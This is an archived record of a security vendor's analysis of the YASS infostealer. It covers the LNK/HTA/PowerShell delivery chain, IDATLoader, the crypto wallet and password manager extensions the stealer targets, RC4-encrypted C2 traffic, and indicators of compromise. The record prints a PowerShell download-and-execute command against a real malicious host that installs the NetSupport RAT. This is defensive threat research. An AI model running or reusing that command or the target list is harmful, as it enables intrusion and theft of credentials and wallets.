{ "id": "2456b166-5a7f-4d88-9394-98bfa61e9f05", "created_at": "2026-04-06T00:21:19.13334Z", "updated_at": "2026-04-10T03:21:23.395699Z", "deleted_at": null, "sha1_hash": "7ef7e4aa8cbe87739b14a95d8ca85a03308db22a", "title": "There's Something About CryptBot: Yet Another Silly Stealer (YASS)", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 4596252, "plain_text": "There's Something About CryptBot: Yet Another Silly Stealer\r\n(YASS)\r\nBy Research Team\r\nPublished: 2024-09-10 · Archived: 2026-04-05 13:56:53 UTC\r\nWritten by Ryan Robinson and Joakim Kennedy \r\nRecently Intezer was investigating a file that we came across during alert triage. This particular file piqued our\r\ninterest due to the interesting delivery chain, and the even more interesting payload, an intricate infostealer.\r\nIntezer has amazing code genetic analysis technology, showing us overlaps of code reuse between different files,\r\nmalicious or not. We noticed that the payload did not have significant code overlap with other infostealers. Upon\r\nresearching the threat and pivoting to similar samples, we understand that other vendors are labeling this as\r\nCryptBot. While the similarities are undeniable, the differences in code are significant enough that this version\r\nwarrants its own documentation, and even its own name, Yet Another Silly Stealer (YASS). In this blog, we’ll\r\nhighlight both the parallels and the distinctions between these two infostealers, underscoring why this variant\r\ndemands attention. This blog will give a technical analysis of the delivery chain, as well as an analysis of the\r\nYASS payload. The stealer was delivered using a multi-stage downloader that we are calling MustardSandwich.\r\nThe cybersecurity landscape is constantly witnessing a wave in the creation of new and updated infostealers, with\r\nmalware developers continuously innovating to bypass defenses. While it may feel like a never-ending cat-and-mouse game, cataloging as many of these stealers as possible remains crucial. By doing so, we can better\r\nunderstand emerging tactics, enhance threat detection, and ultimately protect our sensitive data. Every new variant\r\ncataloged strengthens our defenses and helps to anticipate future threats, making the effort vital despite the\r\nrelentless pace of cybercriminal innovation.\r\nAttack Flow of new YASS infostealer, with some similarities and notable difference from Cryptbot\r\nhttps://intezer.com/blog/research/cryptbot-yet-another-silly-stealer-yass/\r\nPage 1 of 18\n\nMustard Sandwich Downloader\r\nIn the cases where we have identified the MustardSandwich downloader, it has been executed using a Windows\r\nshell link (LNK) file. The LNK file uses the Windows system binary forfiles.exe to invoke PowerShell which\r\ncalls mshta. An example of the command line arguments for one of the LNK files is shown below.\r\nLNK File Arguments\r\nThe LNK files are used to execute a Microsoft HTML application (HTA) using mshta. The malware abuses the\r\nlooseness of the mshta parser to hide the HTML within “junk” data. The HTML document has been broken up\r\ninto multiple parts and “sandwiched” between multiple copies of the same Windows binary. The screenshot below\r\nshows the output from binwalk of one of the files with annotations showing where the different parts of the\r\ndocument are located.\r\nBinwalk output of the EXE containing HTA\r\nThis technique provides some anti-analysis by automated solutions because most solutions will identify the file as\r\na Windows executable (PE). When the file is executed in a sandbox, nothing malicious will happen. To invoke the\r\nmalicious code, mshta must be used.\r\nThe downloader consists of two JScript stages and two PowerShell stages. The first PowerShell script is executed\r\nvia an ActiveXObject, as seen in the screenshot below.\r\nJScript Payload\r\nThe first PowerShell script decrypts the final stages. The stage has been encrypted using AES, and the key varies\r\nbetween attacks. An example of the stages is shown below.\r\nhttps://intezer.com/blog/research/cryptbot-yet-another-silly-stealer-yass/\r\nPage 2 of 18\n\nPowerShell Payload\r\nThe final stage is responsible for downloading the decoy and the malware to run on the machine. We have\r\nobserved two types of this stage, one that downloads multiple payloads and another that only downloads one\r\npayload.\r\nDecoy Video\r\nThe screenshot below shows a cleaned-up version of the “main” script function. First, it checks if the lure exists\r\non disk, if not, it’s downloaded and displayed to the user. This version also appears to be tracking installations by\r\nsending a simple web request to a separate URL. After the lure has been displayed to the user, the two payloads\r\nare downloaded and executed.\r\nhttps://intezer.com/blog/research/cryptbot-yet-another-silly-stealer-yass/\r\nPage 3 of 18\n\nPowerShell Downloading Additional Payloads\r\nThe URLs hosting the payloads have been obfuscated with a simple logic. Each character in the string has been\r\nconverted to an integer and a constant has been added to each one. The function shown below is used to reverse\r\nthe obfuscation.\r\nDecoding Function\r\nThe payloads are downloaded as ZIP archives. The stage uses the function shown below to extract the content and\r\nexecute the payload. It’s worth noting that the function executes the first file from an alphabetic sort of the content\r\nof the archive.\r\nRunning First File in Archive\r\nhttps://intezer.com/blog/research/cryptbot-yet-another-silly-stealer-yass/\r\nPage 4 of 18\n\nThe simpler version of this stage, from a related chain, is shown below. It doesn’t expect the payloads to be stored\r\nin ZIP files, nor have the install tracking functionality.\r\nSimplified Version of Related Chain\r\nIDATLOADER\r\nInside the second downloaded ZIP file (L2.zip) is a single executable file. This is a Delphi file\r\n(4810333bf96fb808604f3657118c734c3dd8ee4baa3e6ffe8da548ae0c8e15d3) that contains a lot of boiler plate\r\ncode for Delphi visual components.\r\nIDATLOADER File\r\nThe code for starting IDATLoader is hidden amongst all the boiler plate code. IDATLOADER will inject\r\nshellcode into pla.dll that will then extract a PNG resource from the Delphi file and move it into the Temp folder.\r\nhttps://intezer.com/blog/research/cryptbot-yet-another-silly-stealer-yass/\r\nPage 5 of 18\n\nPNG Containing Payload\r\nFrom this PNG, the payload is extracted, a stealer.\r\n(7ac46eb84f4b6d25601f23d2c30b7e80b6f3b2d82d3240234fc50af75290a29f)\r\nTechnical Analysis of Infostealer\r\nInitialisation \r\nYASS starts its operations by performing a sleep. Then the stealer will decrypt a block of strings that are used as\r\nglobal variables for the stealer’s functionality. There are two blocks of RC4 encrypted strings. A small key is\r\nhardcoded via stack strings in the binary for decryption. The two blocks of strings are the same strings but one is a\r\nwide char and the other is normal ASCII. \r\nhttps://intezer.com/blog/research/cryptbot-yet-another-silly-stealer-yass/\r\nPage 6 of 18\n\nDecrypted Strings\r\nThis block of strings contains important information such as C2 information, staging folders, persistence strings\r\nand functions to be dynamically resolved. The full list of decoded strings are located here.\r\nNext the stealer will fetch two environment variables. \r\nLocalAppData: Gives appdata/local path\r\nUserProfile: Gives path to user home\r\nThese variables are concatenated with two strings, in order to check for their presence. \r\nC:\\Users\\[username]\\AppData\\Local\\Gabatepi\r\nC:\\Users\\admin\\Desktop\\Invoice.docx\r\nThe malware will exit if either exists at this point. The first path is the location of a folder, seemingly used as a\r\nmutex to ensure only one running instance. The latter appears to be an anti sandbox check. \r\nIf the staging folder does not exist, the stealer will not exit, and will create this directory.\r\nhttps://intezer.com/blog/research/cryptbot-yet-another-silly-stealer-yass/\r\nPage 7 of 18\n\nFolder used as Mutex\r\nBefore stealing activities begin the stealer will generate a unique user ID, ZIP it, and send it to the C2. \r\nLocation of Sensitive Data\r\nYASS starts its stealing activities by locating directories where sensitive data is commonly held. It starts a\r\nrecursive search from the user profile path: \r\nC:Users[username]\r\nThe stealer will start to iterate over each file. The file path is compared against a very large hard coded list of\r\ndirectories. The directories cover many categories, including programming, gaming, messaging, cloud storage,\r\nOffice products, torrent, utilities, and antivirus. \r\nhttps://intezer.com/blog/research/cryptbot-yet-another-silly-stealer-yass/\r\nPage 8 of 18\n\nSnippet of Targeted Directories\r\nIf there is a directory match. The stealer will make a check for the folder:\r\nLocal Extension Settings\r\nIf this is the current folder. The stealer will identify folders related to targeted Opera and Google Chrome\r\nExtensions. \r\nhttps://intezer.com/blog/research/cryptbot-yet-another-silly-stealer-yass/\r\nPage 9 of 18\n\nCheck for Browser Extensions\r\nTargeted Extensions:\r\nExtension Product\r\nnkbihfbeogaeaoehlefnkodbefgpgknn MetaMask\r\nejbalbakoplchlghecdalmeeeajnimhm MetaMask\r\nljfoeinjpaedjfecbmggjgodbgkmjkjk MetaMask\r\nnkbihfbeogaeaoehlefnkodbefgpgknn MetaMask\r\nbfnaelmomeimhlpmgjnjophhpkkoljpa Phantom\r\nibnejdfjmmkpcnlpebklmnkoeoihofec TronLink\r\nfhbohimaelbohpjbbldcngcnapndodjp BNB Chain Wallet\r\njnlgamecbpmbajjfhmmmlhejkemejdma Braavos\r\ndlcobpjiigpikoobohmabehhmhfoodbb Argent X\r\nfnjhmkhhmkbjkkabndcnnogagogbneec Ronin Wallet\r\nafbcbjpbpfadlkmhmclhkeeodmamcflc Math Wallet\r\nfhilaheimglignddkjgofkcbgekhenbh Oxygen\r\nffnbelfdoeiohenkjibnmadjiehjhajb Yoroi\r\nmopnmbcafieddcagagdcbnhejhlodfdd Polkadot\r\nhttps://intezer.com/blog/research/cryptbot-yet-another-silly-stealer-yass/\r\nPage 10 of 18\n\nbhhhlbepdkbapadjdnnojkbgioiodbic Solflare Wallet\r\nopcgpfmipidbgpenhmajoajpbobppdil Sui Wallet\r\nnngceckbapebfimnlniiiahkandclblb Bitwarden\r\nhdokiejnpimakedhajhdlcegeplioahd LastPass\r\nkkpllkodjeloidieedojogacfhpaihoh Enkrypt Wallet\r\nacmacodkjbdgmoleebolmdjonilkdbch Rabby Wallet\r\ngaedmjdfmmahhbjefcbgaolhhanlaolb Authy\r\nhifafgmccdpekplomjjkcfgodnhcellj Crypto.com\r\nklnaejjgbibmhlephnhpmaofohgkpgkd ZilPay\r\naholpfdialjgjfhomihkjbmgjidlcdno Exodus Web3 Wallet\r\negjidjbpglichdcondbcbdnbeeppgdph Trust Wallet\r\nefbglgofoippbgcjepnhiblaibcnclgk Martian\r\nmcohilncbfahbmgdjkbpemcciiolgcge OKX Wallet\r\nbhghoamapcdpbohphigoooaddinpkbai Authenticator\r\naflkmfhebedbjioipglgcbcmnbpgliof Backpack\r\nidnnbdplmphpflfnlkomgpfbpcgelopg Xverse Wallet\r\nppbibelpcjmhbdihakflkdcoccbgbkpo UniSat Wallet\r\nomaabbefbmiijedngplfjmnooppbclkk Tonkeeper\r\nlgmpcpglpngdoalbgeoldeajfclnhafa SafePal Extension Wallet\r\ndmkamcknogkgcdfhhbddcghachkejeap Keplr\r\nookjlbkiijinhpmnjffcofjonbfbgaoc Temple Tezos Wallet\r\nnlbmnnijcnlegkjjpcfjclmcfggfefdm MyEtherWallet\r\ncjelfplplebdjjenllpjcblmjkfcffne Jaxx Liberty\r\nhpglfhgfnhbgpjdenjgmdgoeiappafln Guarda\r\nfhmfendgdocmcbmfikdcogofphimnkno Sollet\r\nimloifkgjagghnncjkhggdhalmcnfklk Trezor Password Manager\r\nhttps://intezer.com/blog/research/cryptbot-yet-another-silly-stealer-yass/\r\nPage 11 of 18\n\nThe stealer also searches for other more generic folders that might hold sensitive browser and wallet information.\r\nThe stealer will look for references to login data, cookies, web data, user data, backups and wallets. Brave browser\r\nand Telegram are targeted also. \r\nTargeted Files\r\nThe stolen files are built up into a structured ZIP file before being exfiltrated. Along with a log of the stolen files,\r\nand a screenshot of the victim machine. \r\nExfiltrated Data Structure\r\nThe directories in the exfiltrated ZIP file are structured in a way to help the recipient threat actor better navigate\r\nthe stolen data. The main categories are:\r\nApps \r\nBrowsers \r\nFiles \r\nWallets\r\nThe infostealer has an optional auxiliary method of stealing. YASS can iterate through a number of hardcoded\r\ndrives and look for files which it considers “Other” category, sending it to a different server from the main\r\nactivities. This may be used to attempt to collect miscellaneous files to run parsers through at a later stage.\r\nhttps://intezer.com/blog/research/cryptbot-yet-another-silly-stealer-yass/\r\nPage 12 of 18\n\nAdditional Stealing Method\r\nInformation Gathering\r\nYASS will gather information, into a text file, about the infected computer to send to the C2. The information is\r\ngathered mainly from the registry or through Windows API calls. Information includes localized information\r\nabout the machine such as username and language, as well as physical aspects such as the processor, RAM, and\r\nGPU. This is collated into a text file before being sent to the C2. \r\nCompleted Fingerprint TXT File\r\nC2 Communication\r\nYASS communicates with the C2 via HTTP POST requests. All information and stolen files are first collected and\r\npackaged into a ZIP file. Before the ZIP file is sent to the C2, it is encrypted via RC4 using an interesting\r\ntechnique. YASS will generate a unique key for each file sent. \r\nThe unique key is a concatenation of a key from the decrypted block of strings and a dynamically generated key\r\nthat is unique with each POST request. In order for the server to be able to decrypt the data, the latter half of the\r\nhttps://intezer.com/blog/research/cryptbot-yet-another-silly-stealer-yass/\r\nPage 13 of 18\n\nRC4 key is shared through the filename metadata of the form data. This increases resistance to decryption of the\r\nstolen data by unauthorized parties, and also makes detection harder for defenders as there are no discernible\r\npatterns in order to create detections based on network signatures. \r\nFormat of RC4 Encryption Key\r\nYASS does not expect any specific reply from the server. The server will reply “OK” when it receives information\r\nfrom the stealer. \r\nNetSupport Client\r\nThe stealer also has the ability to drop the NetSupport Client as a backdoor for the infected machine. The client is\r\ndeployed via a PowerShell command and script. \r\n/c powershell -NoP -NonI -ExecutionPolicy Bypass -Command \"$Resp = Invoke-WebRequest -\r\nUri 'https://brewdogebar[.]com/code.vue' -UseBasicParsing -UserAgent 'Mozilla/5.0\r\n(Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0\r\nSafari/537.36'; $Scr = [System.Text.Encoding]::UTF8.GetString($Resp.Content); IEX $Scr\"\r\nhttps://intezer.com/blog/research/cryptbot-yet-another-silly-stealer-yass/\r\nPage 14 of 18\n\nThe PowerShell command reaches out to a server to download an additional script. The PowerShell script\r\ndownloads components for the NetSupport remote access tool, with a configuration file. The script also sets\r\npersistence and informs the server if target crypto wallet folders are detected. \r\nPowerShell Script Downloading NetSupport\r\nCryptBot – CryptNot – CryptWhat?!\r\nOver the years CryptBot has been under continuous development. The modifications of CryptBot have been\r\ndocumented in other blogs, particularly by AhnLab [1,2]. Much like the Ship of Theseus, this infostealer\r\nchallenges the essence of identity. Though its code has been entirely replaced compared to its original versions.\r\nThe behavioral echoes are unmistakable, pointing to the same malware developer behind it. With this in mind, we\r\nwish to talk about some of the similarities and differences.\r\nhttps://intezer.com/blog/research/cryptbot-yet-another-silly-stealer-yass/\r\nPage 15 of 18\n\nInitial Triage Showing Unknown Code\r\nWhen we first came across this file, we did not see any significant code overlap with any other known code\r\nstealers. There is a notable overlap in targeted software with other stealers, particularly LummaC2. Another\r\nsimilarity with LummaC2 is the use of ZIP files and a one-way command and control server. \r\nThe strings share many overlaps with other stealers. This would be quite expected as competing malware\r\ndevelopers would be able to see what folders or applications their competitors are targeting and add those paths to\r\ntheir own stealing mechanisms. YASS shares strings with Vidar, AMOS, ImBetter, RedLine, Sharp, Arkei, Atomic,\r\nand SolarMarker\r\nRelated Strings\r\nWhile YASS uses techniques similar to CryptBot, the implementation is different. The shared techniques with\r\nCryptBot include:\r\nhttps://intezer.com/blog/research/cryptbot-yet-another-silly-stealer-yass/\r\nPage 16 of 18\n\nUse of a folder as a mutex\r\nExfil server using a “.top” TLD.\r\nStealing SQLite database files instead of querying the data.\r\nSimilar system information report structure.\r\nSimilar POST request to the exfil server.\r\nShared strings\r\nSecondary exfil server\r\nAdditional payload deployment\r\nEven though we see these similarities, we aren’t comfortable classifying YASS as just a newer version of\r\nCryptBot. There are also some significant differences. This stealer doesn’t have a well-structured configuration,\r\nuses a different encryption scheme, and has hardcoded functionality, via PowerShell, to download and install the\r\nNetSupport client. Many of the format strings look very similar but use different specifiers, the produced strings\r\nlook the same, but the “implementation” is different. YASS also has some unused strings that are used by\r\nCryptBot. It’s like all the code has been rewritten, and a few strings have been forgotten and left, much like\r\nvestigial organs.\r\nWe can’t tell if the strings have been planted and that YASS has been made to imitate CryptBot as much as\r\npossible. It is not the first time we have come across malware that imitates other malware. So are we seeing an\r\nattempt to deflect suspicion towards malware that’s in the hot water? In April 2023, the United States District\r\nCourt Southern District Of New York unsealed a complaint filed by Google against some distributors and the\r\ncreator of CryptBot, so making your infostealer appear as CryptBot may keep a target off your back. The\r\nalternative is a “Ship of Theseus”. Either way, we are happy to present CryptBot’s latest step-sibling: YASS.\r\nIOCs\r\nLNK file\r\ne3bf61f6f96d1a121a1f7f47188cd36fc51f4565ca8cd8fc07207e56a038e7ca\r\nHTA (EXE)\r\nfd7654c5bb79652bc0db2696da35497b9aff2c783ec4c83705d33d329dc742d8\r\nhttps://nextomax.b-cdn[.]net/nexto (Hosting Server)\r\nhttps://forikabrof[.]click/flkhfaiouwrqkhfasdrhfsa.png (Pinged by PowerShell Script)\r\nZIP\r\nb2080e7705283fce7e03c8895977c5e8c451b5f8a6eb3faecb8acb986a1587c6\r\nhttps://nextomax.b-cdn[.]net/L2.zip (Hosting Server)\r\nIDATLOADER\r\n4810333bf96fb808604f3657118c734c3dd8ee4baa3e6ffe8da548ae0c8e15d3\r\nhttps://intezer.com/blog/research/cryptbot-yet-another-silly-stealer-yass/\r\nPage 17 of 18\n\nYASS (Stealer)\r\n7ac46eb84f4b6d25601f23d2c30b7e80b6f3b2d82d3240234fc50af75290a29f (Unpacked from IDATLOADER)\r\nrceight8sr[.]top\r\ngrabios[.]org\r\nNetSupport RAT\r\nbrewdogebar[.]com (Hosting Server)\r\nenotik5050[.]com\r\nbarsuk5050[.]com\r\n94.232.244[.]133\r\nSource: https://intezer.com/blog/research/cryptbot-yet-another-silly-stealer-yass/\r\nhttps://intezer.com/blog/research/cryptbot-yet-another-silly-stealer-yass/\r\nPage 18 of 18", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://intezer.com/blog/research/cryptbot-yet-another-silly-stealer-yass/" ], "report_names": [ "cryptbot-yet-another-silly-stealer-yass" ], "threat_actors": [], "ts_created_at": 1775434879, "ts_updated_at": 1775791283, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/7ef7e4aa8cbe87739b14a95d8ca85a03308db22a.pdf", "text": "https://archive.orkl.eu/7ef7e4aa8cbe87739b14a95d8ca85a03308db22a.txt", "img": "https://archive.orkl.eu/7ef7e4aa8cbe87739b14a95d8ca85a03308db22a.jpg" } }